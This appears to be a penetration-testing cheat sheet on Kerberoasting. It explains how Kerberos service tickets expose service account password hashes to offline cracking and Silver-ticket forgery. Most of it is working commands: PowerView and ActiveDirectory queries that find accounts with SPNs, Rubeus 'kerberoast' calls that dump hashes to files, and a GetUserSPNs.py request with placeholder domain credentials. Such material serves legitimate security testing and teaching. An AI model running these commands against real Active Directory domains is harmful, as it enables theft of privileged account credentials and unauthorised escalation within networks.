Offline cracking of service account passwords. The Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of service account. This makes it possible to request a ticket and do offline password attack. Service accounts are many times ignored (passwords are rarely changed) and have privileged access. Password hashes of service accounts could be used to create Silver tickets.
The attack occurs in step 4: a TGS is requested from which the password hash of the target service account (with Rubeus/GetUserSPNs.py) is extracted and cracked offline. The requested TGS is then not presented to the application server (AP-REQ) but is saved and cracked offline.
Find user accounts used as Service Accounts
Get-DomainUser -SPN #PowerView
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
#ActiveDirectory module
Use Rubeus to list Kerberoast users and stats (ONLY FROM AD JOINED MACHINE)
.\\Rubeus.exe kerberoast
.\\Rubeus.exe kerberoast /stats
Use Rubeus to request a TGS and save it to a file:
.\\Rubeus.exe kerberoast /user:svctest /simple
.\\Rubeus.exe kerberoast /user:svctest /outfile:svctest.txt
Kerberoast all possible account:
.\\Rubeus.exe kerberoast /outfile:KerbUsers_hashes.txt
sudo GetUserSPNs.py <domain>/<user>:<password> -dc-ip <ip.of.domain.controller> -request -outputfile kerber.hash